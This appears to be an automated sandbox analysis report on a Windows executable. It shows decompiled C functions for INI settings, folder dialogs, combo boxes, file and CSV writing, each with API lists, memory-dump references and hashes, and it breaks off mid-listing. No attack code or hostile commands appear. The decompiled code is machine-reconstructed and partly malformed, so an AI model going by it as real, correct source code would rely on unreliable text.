                                                                                                                                                                                                                          0x00409e05
                                                                                                                                                                                                                          0x00409e06
                                                                                                                                                                                                                          0x00409e3b
                                                                                                                                                                                                                          0x00409e5d
                                                                                                                                                                                                                          0x00409e6a
                                                                                                                                                                                                                          0x00409e73
                                                                                                                                                                                                                          0x00409e75
                                                                                                                                                                                                                          0x00409e08
                                                                                                                                                                                                                          0x00409e08
                                                                                                                                                                                                                          0x00409e19
                                                                                                                                                                                                                          0x00409e37
                                                                                                                                                                                                                          0x00409e37
                                                                                                                                                                                                                          0x00409e81

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E08
                                                                                                                                                                                                                            • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                                                                                                                            • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E3B
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                                          • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                                                                                                                          0x0040ad06
                                                                                                                                                                                                                          0x0040ad0a
                                                                                                                                                                                                                          0x0040ad0c
                                                                                                                                                                                                                          0x0040ad14
                                                                                                                                                                                                                          0x0040ad19
                                                                                                                                                                                                                          0x0040ad1f
                                                                                                                                                                                                                          0x0040ad23
                                                                                                                                                                                                                          0x0040ad27
                                                                                                                                                                                                                          0x0040ad2a
                                                                                                                                                                                                                          0x0040ad2d
                                                                                                                                                                                                                          0x0040ad34
                                                                                                                                                                                                                          0x0040ad3b
                                                                                                                                                                                                                          0x0040ad3e
                                                                                                                                                                                                                          0x0040ad44
                                                                                                                                                                                                                          0x0040ad48
                                                                                                                                                                                                                          0x0040ad4a
                                                                                                                                                                                                                          0x0040ad52
                                                                                                                                                                                                                          0x0040ad5a
                                                                                                                                                                                                                          0x0040ad64
                                                                                                                                                                                                                          0x0040ad65
                                                                                                                                                                                                                          0x0040ad6b
                                                                                                                                                                                                                          0x0040ad6c
                                                                                                                                                                                                                          0x0040ad73
                                                                                                                                                                                                                          0x0040ad76
                                                                                                                                                                                                                          0x0040ad7c
                                                                                                                                                                                                                          0x0040ad7c
                                                                                                                                                                                                                          0x0040ad7f
                                                                                                                                                                                                                          0x0040ad84

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                                          • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                                                                                                                          0x00404a62
                                                                                                                                                                                                                          0x00404a6a
                                                                                                                                                                                                                          0x00404a6e
                                                                                                                                                                                                                          0x00404a71
                                                                                                                                                                                                                          0x00404a74
                                                                                                                                                                                                                          0x00404a92
                                                                                                                                                                                                                          0x00404a92
                                                                                                                                                                                                                          0x00404a76
                                                                                                                                                                                                                          0x00404a76
                                                                                                                                                                                                                          0x00404a87
                                                                                                                                                                                                                          0x00404a90
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404a90
                                                                                                                                                                                                                          0x00404aa3
                                                                                                                                                                                                                          0x00404aa7
                                                                                                                                                                                                                          0x00404aa7
                                                                                                                                                                                                                          0x00404a94
                                                                                                                                                                                                                          0x00404a98

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404A52
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                                          • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                                                                          • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                                                                                                                          0x004072e0
                                                                                                                                                                                                                          0x004072f7
                                                                                                                                                                                                                          0x004072fd
                                                                                                                                                                                                                          0x00407316
                                                                                                                                                                                                                          0x00407342

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004072FD
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407328
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                          • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                                                          0x00408dd0
                                                                                                                                                                                                                          0x00408dd2
                                                                                                                                                                                                                          0x00408de2
                                                                                                                                                                                                                          0x00408df4
                                                                                                                                                                                                                          0x00408e01
                                                                                                                                                                                                                          0x00408e1b
                                                                                                                                                                                                                          0x00408e21
                                                                                                                                                                                                                          0x00408e28
                                                                                                                                                                                                                          0x00408e30
                                                                                                                                                                                                                          0x00408dd4
                                                                                                                                                                                                                          0x00408dd8
                                                                                                                                                                                                                          0x00408dd8

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                                          • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                                                                                                                          0x004050e1
                                                                                                                                                                                                                          0x004050ec
                                                                                                                                                                                                                          0x004050ee
                                                                                                                                                                                                                          0x004050f5
                                                                                                                                                                                                                          0x004050ff
                                                                                                                                                                                                                          0x00405114
                                                                                                                                                                                                                          0x00405118
                                                                                                                                                                                                                          0x00405123
                                                                                                                                                                                                                          0x00405128
                                                                                                                                                                                                                          0x00405101
                                                                                                                                                                                                                          0x00405109
                                                                                                                                                                                                                          0x0040510f
                                                                                                                                                                                                                          0x0040512e

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcslen$wcscatwcsncat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 291873006-0
                                                                                                                                                                                                                          • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                                                                                                                          0x00402de0
                                                                                                                                                                                                                          0x00402de2
                                                                                                                                                                                                                          0x00402dec
                                                                                                                                                                                                                          0x00402def
                                                                                                                                                                                                                          0x00402dfb
                                                                                                                                                                                                                          0x00402e0c
                                                                                                                                                                                                                          0x00402e0e
                                                                                                                                                                                                                          0x00402e0e
                                                                                                                                                                                                                          0x00402e16
                                                                                                                                                                                                                          0x00402e18
                                                                                                                                                                                                                          0x00402e1a
                                                                                                                                                                                                                          0x00402e21

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                                                                                                                            • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4235085887-0
                                                                                                                                                                                                                          • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                          			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                                                                                          0x0040b6a6
                                                                                                                                                                                                                          0x0040b6ad
                                                                                                                                                                                                                          0x0040b6af
                                                                                                                                                                                                                          0x0040b6b0
                                                                                                                                                                                                                          0x0040b6b5
                                                                                                                                                                                                                          0x0040b6b6
                                                                                                                                                                                                                          0x0040b6bd
                                                                                                                                                                                                                          0x0040b6bf
                                                                                                                                                                                                                          0x0040b6c0
                                                                                                                                                                                                                          0x0040b6c5
                                                                                                                                                                                                                          0x0040b6c6
                                                                                                                                                                                                                          0x0040b6cd
                                                                                                                                                                                                                          0x0040b6cf
                                                                                                                                                                                                                          0x0040b6d0
                                                                                                                                                                                                                          0x0040b6d5
                                                                                                                                                                                                                          0x0040b6d6
                                                                                                                                                                                                                          0x0040b6dd
                                                                                                                                                                                                                          0x0040b6df
                                                                                                                                                                                                                          0x0040b6e0
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040b6e5
                                                                                                                                                                                                                          0x0040b6e6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                                                                                                                          0x00407362
                                                                                                                                                                                                                          0x00407369
                                                                                                                                                                                                                          0x0040736e
                                                                                                                                                                                                                          0x00407371
                                                                                                                                                                                                                          0x00407378
                                                                                                                                                                                                                          0x0040737e
                                                                                                                                                                                                                          0x00407381
                                                                                                                                                                                                                          0x00407386
                                                                                                                                                                                                                          0x0040739f
                                                                                                                                                                                                                          0x00407388
                                                                                                                                                                                                                          0x00407391
                                                                                                                                                                                                                          0x00407391
                                                                                                                                                                                                                          0x004073a4
                                                                                                                                                                                                                          0x004073ac
                                                                                                                                                                                                                          0x004073ad
                                                                                                                                                                                                                          0x004073cd
                                                                                                                                                                                                                          0x004073d0
                                                                                                                                                                                                                          0x004073d3
                                                                                                                                                                                                                          0x004073d6
                                                                                                                                                                                                                          0x004073e0
                                                                                                                                                                                                                          0x004073e7
                                                                                                                                                                                                                          0x004073ee
                                                                                                                                                                                                                          0x004073f5
                                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                                          0x0040741a
                                                                                                                                                                                                                          0x0040741d
                                                                                                                                                                                                                          0x00407420
                                                                                                                                                                                                                          0x00407423
                                                                                                                                                                                                                          0x00407426
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
